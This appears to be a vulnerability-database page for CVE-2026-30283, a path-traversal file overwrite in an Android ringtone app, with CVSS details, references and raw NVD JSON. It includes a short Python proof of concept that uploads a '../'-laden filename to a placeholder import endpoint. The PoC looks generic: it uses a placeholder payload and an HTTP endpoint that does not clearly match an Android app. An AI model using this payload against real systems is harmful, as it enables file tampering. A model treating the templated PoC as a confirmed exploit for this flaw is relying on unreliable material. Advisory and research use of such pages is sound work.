CVE-2026-30283

Description

An arbitrary file overwrite vulnerability in PEAKSEL D.O.O. NIS Animal Sounds and Ringtones v1.3.0 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:peaksel:animal_sounds_and_ringtones:1.3.0:*:*:*:*:android:*:* - VULNERABLE

PEAKSEL D.O.O. NIS Animal Sounds and Ringtones v1.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL for the file import endpoint
# Replace with actual target address
target_url = "http://target-ip:port/api/import"

# Malicious payload designed to overwrite a critical file
# Using path traversal (e.g., "../") to escape the intended directory
malicious_filename = "../../../tmp/critical_config_file.bin"
payload_content = b"MALICIOUS_PAYLOAD_CONTENT"

# Construct the multipart form data
files = {
    'file': (malicious_filename, payload_content)
}

try:
    # Send the POST request to trigger the vulnerability
    response = requests.post(target_url, files=files)
    
    if response.status_code == 200:
        print("[+] PoC executed successfully. Check if the file was overwritten.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30283
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30283
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30283/
[4] VulDB https://vuldb.com/cve/CVE-2026-30283
[5] http://animal.com
[6] https://github.com/Secsys-FDU/AF_CVEs/issues/26
[7] https://peaksel.com/
[8] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30283", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:47.313", "lastModified": "2026-04-06T14:49:50.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in PEAKSEL D.O.O. NIS Animal Sounds and Ringtones v1.3.0 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:peaksel:animal_sounds_and_ringtones:1.3.0:*:*:*:*:android:*:*", "matchCriteriaId": "A24366D8-F371-4777-A911-10D64C85C2EB"}]}]}], "references": [{"url": "http://animal.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/26", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://peaksel.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}